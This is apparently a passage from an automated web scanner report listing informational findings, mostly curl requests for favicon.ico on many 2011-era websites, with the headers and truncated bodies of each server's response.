HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7149
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 02 Apr 2011 12:56:48 GMT
Expires: Sat, 02 Apr 2011 12:56:48 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
25.3. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=2178764;type=newkc987;cat=kcomh345;ord=1;num=2714251752477.139? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; BE_CLA=p_id%3D2L8PRN68LAAPR28ANNL404NJ22AH628422%26p_last_ref%3Dhttp%253A//quickbooksonline.intuit.com/bookkeeping-accounting-systems/%253Fsc%253DQBC-V51-SUF-HMEPGE%26s_entry%3Dhttp%253A//fls.doubleclick.net/activityi%253Bsrc%253D1996823%253Btype%253Dfmsco864%253Bcat%253Dqbosi086%253Bord%253D1%253Bnum%253D7793246807996.184%253F%26p_first_ref%3Dhttp%253A//quickbooksonline.intuit.com/bookkeeping-accounting-systems/%253Fsc%253DQBC-V51-SUF-HMEPGE%26p_first_entry%3Dhttp%253A//fls.doubleclick.net/activityi%253Bsrc%253D1996823%253Btype%253Dfmsco864%253Bcat%253Dqbosi086%253Bord%253D1%253Bnum%253D7793246807996.184%253F%26s_expire%3D1300726794236%26s_id%3DJL8PRN68LAAPRJP844P404NJ22AH628422; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sat, 02 Apr 2011 13:57:06 GMT
Expires: Sat, 02 Apr 2011 13:57:06 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 1088

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Start of Standa
...[SNIP]...
25.4. http://www.avast.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.avast.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.avast.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "544016114"
Last-Modified: Wed, 05 May 2010 08:20:54 GMT
Content-Length: 2550
Date: Sat, 02 Apr 2011 13:38:01 GMT
Server: httpd

..............h...&......... .h.......(....... ............................................ ...(...*....... ..."...$...+..."...%...&...(...)...-...>...C..8O..;W..=X..\o...0...;...?...>..    F...H...[...S
...[SNIP]...
25.5. http://www.billsnitzer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.billsnitzer.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.billsnitzer.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 02 Apr 2011 14:18:51 GMT
Server: lighttpd/1.4.28

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
25.6. http://www.cheetahmail.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheetahmail.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cheetahmail.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 10:50:17 GMT
Server: Apache
Last-Modified: Thu, 23 Feb 2006 19:03:21 GMT
ETag: "cb357-21c5-43fe06f9"
Accept-Ranges: bytes
Content-Length: 8645
Content-Type: text/html

<html><head><title>CheetahMail - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="https://f.chtah.com/s/0/0/shared.css">
<body bgcolor="#ffffff" marginheight="0" margin
...[SNIP]...
25.7. http://www.chinaontv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chinaontv.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chinaontv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.46
Date: Sat, 02 Apr 2011 07:50:55 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.46</center>
</body>
</html>
25.8. http://www.citibank.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citibank.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.citibank.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not found
Server: ""
Date: Sat, 02 Apr 2011 13:35:26 GMT
Content-type: text/html
Connection: close
Content-Length: 14811

<HTML>
<HEAD>
   <style>
   <!--
       body {
           background: #fff;
       }
       .notextdecor{
           COLOR: #000099;
           TEXT-DECORATION: none;
       }
       TD{
           COLOR: #000000;
           FONT-FAMILY: verdana, arial, helvetica, sans
...[SNIP]...
25.9. http://www.cobaltnitra.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cobaltnitra.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cobaltnitra.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:56:35 GMT
Content-Length: 1214
Content-Type: text/html
X-Cache: MISS from backend02-1
X-Cache-Lookup: HIT from backend02-1:4001
Age: 260
X-Cache: HIT from frontend02
X-Cache-Lookup: HIT from frontend02:3128
Via: 1.0 backend02-1 (squid), 1.0 frontend02 (squid)
Proxy-Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...
25.10. http://www.coolmath.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolmath.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.coolmath.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:33:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 06 Feb 2010 01:52:56 GMT
ETag: "36680b6-3be-d3afce00"
Accept-Ranges: bytes
Content-Length: 958
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at coolmath.com
</ADDRESS>
</BODY>
</HTM
...[SNIP]...
25.11. http://www.coolmath4kids.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolmath4kids.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.coolmath4kids.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:49 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 08 Feb 2010 23:13:04 GMT
ETag: "2c38487-3c3-f17ba000"
Accept-Ranges: bytes
Content-Length: 963
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at coolmath4kids.com
</ADDRESS>
</BODY>

...[SNIP]...
25.12. http://www.crocoads.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crocoads.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.crocoads.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 02 Apr 2011 13:58:52 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
25.13. http://www.drudgereport.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.drudgereport.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.drudgereport.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 01 Apr 2011 22:42:24 GMT
Server: ch-sc-dr5

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
25.14. http://www.dt00.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dt00.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dt00.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 14:00:05 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Keep-Alive: timeout=20

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.54</center>
</body>
</html>
25.15. http://www.ehow.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ehow.co.uk
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ehow.co.uk
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 1150
Content-Type: text/html
Set-Cookie: v=NEW; expires=Mon, 02 May 2011 14:00:19 GMT; path=/; domain=www.ehow.co.uk;
ETag: "6ed485fcdbc3fdf6d0a3a393e95f5a88:1300482785"
Cache-Control: max-age=40957
Date: Sat, 02 Apr 2011 14:00:19 GMT
Connection: close

............ .h.......(....... ..... .....@......................................s...........................c...........................,...........................................................,..
...[SNIP]...
25.16. http://www.elyricsworld.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 20:22:02 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1321
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
{
   font-size: 12px;
   color: #000000;
   font-f
...[SNIP]...
25.17. http://www.epinions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epinions.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.epinions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:50 GMT
Server: Apache/2.2.14 (Unix) PHP/4.4.9
Cache-control: private
Set-Cookie: EPV_PgVwID=e060b1a6c3caf55e5af3d016; path=/; domain=.epinions.com;
Content-Length: 2494
Content-Type: text/html

...... ..............(... ...@...................................@............ ..@ ... ... ...@..@@...@...@...`..@`...`...`......@...............@...............@...............@............. .@. ...
...[SNIP]...
25.18. http://www.fark.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fark.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fark.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Server: nginx
Date: Sat, 02 Apr 2011 13:56:18 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 162

<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx</center>
</body>
</html>
25.19. http://www.firecue.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firecue.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.firecue.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 14:02:55 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.65</center>
</body>
</html>
25.20. http://www.freedownloadscenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freedownloadscenter.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freedownloadscenter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 503 Service Temporarily Unavailable
Server: Apache/2.2.3 (CentOS)
Date: Sat, 02 Apr 2011 13:39:34 GMT
Content-Type: text/html
Content-Length: 213
Connection: keep-alive

<html>
<head><title>503 Service Temporarily Unavailable</title></head>
<body bgcolor="white">
<center><h1>503 Service Temporarily Unavailable</h1></center>
<hr><center>nginx/0.7.65</center>
</bod
...[SNIP]...
25.21. http://www.freeze.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freeze.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freeze.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:38:16 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
25.22. http://www.hbo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbo.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hbo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:15:40 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
g: u
Content-Type: text/html
Content-Length: 3130

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>HBO: 404 Page Not Found</title>
<script language="JavaScript" src="/scri
...[SNIP]...
25.23. http://www.iloveindia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iloveindia.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.iloveindia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:56:57 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.9
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 23719

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<HTML>

<HEAD>
<TITLE>Page not found - iloveindia.com</TITLE>

<LINK HREF="/homestyle.css" TYPE="text/css" REL="STYLESHEET
...[SNIP]...
25.24. http://www.intuit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intuit.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.intuit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:39:41 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: policyref="http://smallbusiness.intuit.com/small-business/privacy/index.jsp",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Content-Length: 3585
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>Error 404: Page Not Found</title>
<link href="/css/wcgErrorPgs.css" re
...[SNIP]...
25.25. http://www.iwin.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iwin.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.iwin.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:42:07 GMT
Content-Type: text/html
Server: Apache
Content-Length: 952
Date: Sat, 02 Apr 2011 13:42:07 GMT
X-Varnish: 931872621
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<html><head><title>Apache Tomcat/6.0.14 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
25.26. http://www.lingospot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lingospot.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lingospot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: LUI=979b847691af299f; Path=/; Expires=Fri, 31-Dec-2015 23:59:59 GMT; Domain=.lingospot.com
Set-Cookie: LUI=8ac36f99936b606b; Path=/; Expires=Fri, 31-Dec-2015 23:59:59 GMT; Domain=.lingospot.com
Content-Type: text/html
Content-Length: 345
Date: Sat, 02 Apr 2011 14:04:58 GMT
Server: lighttpd/1.4.15

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
25.27. http://www.moviesunlimited.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moviesunlimited.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.moviesunlimited.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:53:31 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>
25.28. http://www.music-oasis.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.music-oasis.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.music-oasis.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:38 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
25.29. http://www.olpinhoopes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.olpinhoopes.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.olpinhoopes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:00:34 GMT
Server: Apache
Content-Type: text/html
Content-Length: 1691

<HTML>
   <HEAD><TITLE>Page Not Found</TITLE></HEAD>

   <BODY BGCOLOR="#FFFFFF" LINK="maroon" VLINK="maroon"
ALINK="maroon">
   <CENTER>
   <TABLE WIDTH="85%" BORDER="1" BORDERCOLOR="#000000"
CELLSPACING="
...[SNIP]...
25.30. http://www.rmloader.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rmloader.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rmloader.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 02 Apr 2011 13:54:11 GMT
Server: lighttpd/1.4.28

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
25.31. http://www.samsung.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.samsung.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.samsung.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 16
Date: Sat, 02 Apr 2011 13:43:30 GMT
Connection: close

Object not found
25.32. http://www.socialsurveys.us/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.socialsurveys.us
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.socialsurveys.us
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:55:46 GMT
Server: UltraDNS Client Redirection Server
Last-Modified: Sat, 02 Apr 2011 13:55:46 GMT
Accept-Ranges: none
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<html>
<head><title>UltraDNS Client Redirection Service</title></head>
<body><table border="2" width="100%">
<tr bgcolor="#FF4444"><th colspan="2"
...[SNIP]...
25.33. http://www.sparkstudios.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sparkstudios.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sparkstudios.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:51:13 GMT
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 389

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...
25.34. http://www.springerlink.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.springerlink.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.springerlink.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 13:45:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 212

<HTML><BODY><H3>403 Forbidden</H3><I>ErrorId: 0428e6a8-4d28-4d50-909e-92b57031a6ae</I><p>Please contact <a href="mailto:support@metapress.com">support@metapress.com</a> if this problem persists.</p></
...[SNIP]...
25.35. http://www.swagbucks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.swagbucks.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swagbucks.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 631
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:52:54 GMT

<HTML>
<HEAD>
<TITLE></TITLE>
<style>
body,html{margin: 0; padding: 0; height: 100%; overflow: hidden;}
</style>
</HEAD>
<BODY>
<iframe style="height: 100%; width: 100%;" frameborder="0" src="
...[SNIP]...
25.36. http://www.thegrids.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thegrids.info
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thegrids.info
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:05:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.3 ZendServer/5.0
